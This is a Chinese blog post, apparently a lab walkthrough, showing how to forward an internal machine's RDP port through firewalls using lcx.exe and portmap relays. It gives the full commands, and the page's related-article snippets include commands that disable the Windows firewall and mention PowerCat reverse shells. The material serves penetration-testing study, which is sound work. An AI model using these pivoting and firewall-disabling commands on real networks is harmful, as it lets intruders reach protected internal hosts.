传输层隧道技术

最新推荐文章于 2024-05-01 18:26:17 发布
最新推荐文章于 2024-05-01 18:26:17 发布
阅读量470 收藏
点赞数
文章标签: 哈希算法 web安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45715461/article/details/125148188
版权

环境准备

名字IP地址内/外网
Infogather192.168.1.151外网
VPS192.168.1.129外网
Win710.0.1.4内网

Windows平台(Lcx)

  1. 外网Infogather机器运行以下如图的命令,把3333端口转发到自己的2222端口
Lcx.exe -listen 3333 2222

img

内网的Win7运行以下如图的命令

Lcx.exe -slave 192.168.1.151(转发的目标地址) 3333(转发的目标端口) 10.0.1.4(本机的ip地址) 3389

img

VPS连接Infogather的2222端口,连接成功,如图所示

rdesktop 192.168.1.151:2222

img

Linux平台(portmap)

portmap的命令:
Usage:./portmap -m method [-h1 host1] -p1 port1 [-h2 host2] -p2 port2 [-v] [-log filename]
	-v: version
	-h1: host1
	-h2: host2
	-p1: port1
	-p2: port2
	-log: log the data
	-m: the action method for this tool
	1: listen on PORT1 and connect to HOST2:PORT2
	2: listen on PORT1 and PORT2
	3: connect to HOST1:PORT1 and HOST2:PORT2
  1. VPS先开启如图所示的命令,把192.168.1.129:3333端口的流量转发到本机2222端口
./portmap -m 2 -p1 2222 -h2 192.168.1.129 -p2 3333

img

内网的Win7机器运行如图所示的命令,把内网10.0.1.4:3389端口转发到win7的3333端口中

Lcx.exe -slave 192.168.1.129 3333 10.0.1.4 3389

img

VPS开启远程访问,如图所示

rdesktop 192.168.1.129:2222

img

连接成功,如图所示

img

总结

传输层隧道技术有TCP、UDP和端口转发等,由于内网防火墙禁止外网访问内网的一些指定端口,如3389端口,因此攻击者就会利用端口转发的技术,来对目标机器进行端口转发,转发成一个不被防火墙禁止的端口,从而实现对防火墙的绕过。

俺不想学习
关注
传输层LCX隧道
战神/calmness的博客
11-19 348
https://github.com/inquisb/icmpsh 准备: kali 192.168.243.141 win7 192.168.243.154 icmp隧道搭建
传输层Netsh隧道
战神/calmness的博客
11-18 194
前提条件 nc下载 https://eternallybored.org/misc/netcat/ 安装在C盘下/用户目录内或者设置环境变量 基本命令 netsh firewall show state 查看系统防火墙状态 netsh firewall set opmode disable 关闭防火墙 netsh firewall set opmode enable 开启防火墙 netsh advfirewall show allprofiles 查看所有类型的防火墙状态 ne
传输层隧道技术--瑞士军刀
wo41ge的博客
12-15 343
netcat 1.基本信息 nc -h 查看帮助信息 -d: 后台模式 -e: 程序重定向 -g<网关>: 设置路由器跃程通信网关,最多可设置8个。 -G<指向器数目>: 设置源路由指向器的数量,值为4的倍数。 -i<延迟秒数>: 设置时间间隔,以便传送信息及扫描通信端口 -l: 使用监听模式,管理和控制传入的数据 -n: 直接使用IP地址(不通过域名服务器) -o<输出文件>: 指定文件名称,把往来传输的数据转换为16进制字符后保存在该文件中 -p<通
内网安全 隐藏通信隧道技术——传输层.(遨游于 内网任何主机)
网络安全领域___专研者.
04-30 2993
隧道技术的概括: 隧道就是一种绕过端口屏蔽的通信方式。防火墙两端的数据包通过防火墙所允许的数据包类型或者端口进行封装,然后穿过防火墙,与对方进行通信。当被封装的数据包到达目的地时,将数据包还原,并将还原后的数据包发送到相应的服务器上。
传输层Powercat.ps1隧道
战神/calmness的博客
11-19 288
目录 描述 过程 用IEX下载远程PS1脚本回来权限绕过执行 正向连接(WINDOWS连接KALI) WINDOWS之间互弹SHELL 描述 •PowerCat是Netcat的Powershell版本 •由于PowerCat是NetCat的PowerShell形式,所以,PowerCat可以无缝的和Netcat连接。PowerCat的用法和Netcat几乎一模一样。 命令参数 •-c 指定一个ip地址 •-p 指定一个端口 •-v 显示详情 •-l 监听模式,用于入站链接 •..
内网渗透课实验—传输层隧道通信.docx
08-29
在内网渗透实验中,传输层隧道通信是一种常用的技术,用于在不同的网络环境中实现远程连接和数据传输。在本实验中,我们将使用 kali Linux 和 Windows operating system来实现传输层隧道通信。 首先,我们需要在 ...
第71天:内网安全-域横向网络&传输&应用层隧道技术1
08-03
1.代理和隧道技术区别 2.隧道技术为了解决什么 3.隧道技术前期的必备条件 1.双向连接反弹 shell 2.多向连接反弹 shell-配合转发 3.相关 n
内网渗透课实验:传输层隧道通信步骤及注意事项
传输层隧道通信是一种通过配置网络通信协议,在不同子网之间进行数据传输的技术。在这个实验中,我们使用了kali和Windows操作系统来进行实验。 首先,我们需要安装必要的软件。在kali上,我们安装了xrdp来启用远程...
【内网渗透】——隐藏通信隧道技术传输层隧道技术
Kris__zhang的博客
06-18 1254
传输层隧道技术 传输层包括TCP隧道,UDP隧道和常规端口转发,内网防火墙阻止了对指定端口的访问,获取目标机器的权限后可以使用IPTABLES打开指定端口 1. lcx端口转发 经典端口转发工具:lcx windows版为lcx.exe , linux版为portmap 正常的socket隧道必须具备两端: 一端为服务端,监听一个端口,等待客户端的连接 一端为客户端,通过传入服务器的IP地址和端口,才能主动与服务器连接 1.1 内网端口转发 在目标机器上执行如下命令将目标机器3389端口的所有数据转发到
2024年网络安全工程师必读的100本书籍
最新发布
2303_79055586的博客
05-01 189
攻击和防守要学的东西也不少,具体要学的东西我都写在了上面的路线图,如果你能学完它们,你去就业和接私活完全没有问题。网上虽然也有很多的学习资源,但基本上都残缺不全的,这是我自己录的网安视频教程,上面路线图的每一个知识点,我都有配套的视频讲解。内容涵盖了网络安全法学习、网络安全运营等保测评、渗透测试基础、漏洞详解、计算机基础知识等,都是网络安全入门必知必会的学习内容。(都打包成一块的了,不能一一展开,总共300多集)因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取。
内网:隧道相关技术概述
prettyX的博客
01-13 508
隧道通信技术 网络层隧道:IPv6、ICMP隧道、GRE隧道 传输层隧道:TCP、UDP 应用层隧道:SSH、HTTP、HTTPS、DNS 正反向socks代理 常用socks代理工具 传统socket端口转发 PS Powercat端口转发 隧道技术在各种网络环境中的实际应用 EW实际应用 Windows下使用sockscap64内网漫游 Linux下使用proxychains...
网络隧道技术
热门推荐
期待幸福
10-09 1万+
隧道技术摘要 隧道技术(Tunneling)是网络基础设置在网络之间传递数据的方式,使用隧道技术传递可以是不同协议的数据包,隧道协议将这些其他协议的数据包重新封装在新的包头中发送。被封装的数据包在隧道的两个端点之间通过网络进行路由,被封装数据包在网络上传递时所经历的逻辑路径称为隧道。 简单来说,隧道技术是一类网络协议,是将一个数据包封装在另一个数据包中进行传输的技术;**使用隧道的原因是在不兼容的网络上传输数据,或在不安全网络上提供一个安全路径。**通过网络隧道技术,可以使隧道两端的网络组成一个更大的内部网
隧道高清网络视频传输解决方案
weixin_33744854的博客
07-05 986
隧道是高速铁路及高速公路中穿行山区、丘陵等复杂地理环境的常用方案。按规定,长度在500米以下为短隧道,500米以上至3000米为中长隧道,3000米以上至10000米为长隧道,10000米以上为特长隧道。为了给长大隧道交通管理提供全面的、直观的监视手段,高清网络视频监控系统已成为必设系统。 隧道高清监控系统主要用于对隧道及道口的交通运行状况实行全范围监视...
TCP/IP卷一:21---链路层之(虚拟链路、单向链路(UDL)、隧道协议(GRE、PPTP、L2TP))
董哥的黑板报
11-04 2977
一、隧道的概念 在某些情况下,两台计算机通过Intemet或其他网络建立一条虚拟链路是有用的。虚拟专用网络(vpN)提供这种服务。实现这类服务的最常用方法称为隧道 隧道技术 一般来说,隧道是 在高层(或同等层)分组中携带低层数据 例如,在一个IPv4或IPv6分组中携带IPv4数据, 在一个UDP、 IPv4或IPv6分组中携带以太网数据 隧道转变了在头部中协议严格分层的思路,并允许形成...
计算机网络-传输层
技术进阶之路
05-27 707
计算机网络的传输层是整个计算机网络体系中的关键层次,向上层的应用层提供服务,它是面向通信部分的最高层,也是用户功能中的最低层。 传输层的功能 提供应用进程间的通信。我们的计算机上运行着多个应用程序,而每个程序却能够准确与对应服务器进行通信,你知道这是为什么吗?我们需要引出一个概念:端口。 什么是端口? 参考文献 2020王道计算机网络 ...
传输层概述
风间琉璃的博客
10-21 1512
文章目录前言一、传输层介绍二、传输层功能1.进程间的逻辑通信2.多路复用/分用(1).无连接分用(2).面向连接分用三、传输层协议1.面向连接TCP2.无连接UDP总结 前言 提示:以下是本篇文章正文内容 一、传输层介绍 传输层:为应用层提供通信服务,使用网络层的服务 1.传输层服务的基本理论和基本机制 (1)复用/分用 (2)可靠数据传输机制 (3)流量控制机制 (4)拥塞控制机制 2.Internet的传输层协议 (1) UDP:无连接传输服务 (2)TCP:面向连接的传输服务 ..
计算机网络——传输层
weixin_43338519的博客
11-23 258
一. 传输层   为进程提供通用的数据传输服务。由于应用层协议很多,定义通用的传输层协议就可以支持不断增多的应用层协议。传输层具有复用和分用功能,复用就是多个应用层进程可以同时使用下面传输层的服务;分用则相反,指传输层把收到的信息分别交付给上面应用层中的相应进程。主要使用传输控制协议TCP和用户数据报协议UDP。 二. UDP(用户数据报协议) UDP是无连接的 尽最大可能交付 没有拥塞控制 面...
传输模式和隧道模式对比
funtasty的专栏
04-15 1916
隧道模式:由于需要对整个数据包进行加密和认证,并且可能涉及地址转换等额外操作,因此相对而言,隧道模式的性能可能较传输模式稍低。总的来说,传输模式和隧道模式在安全通信的范围、适用场景和性能方面有所不同,具体选择取决于实际的网络需求和安全策略。隧道模式:适用于在两个网络之间创建安全的通信隧道,将整个通信流量都加密和保护,并且通常涉及到网络层地址的更改。传输模式:由于仅对数据负载进行加密和认证,因此相对于隧道模式而言,传输模式的性能更高,开销更低。传输模式:用于主机到主机或者主机到网关的通信。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值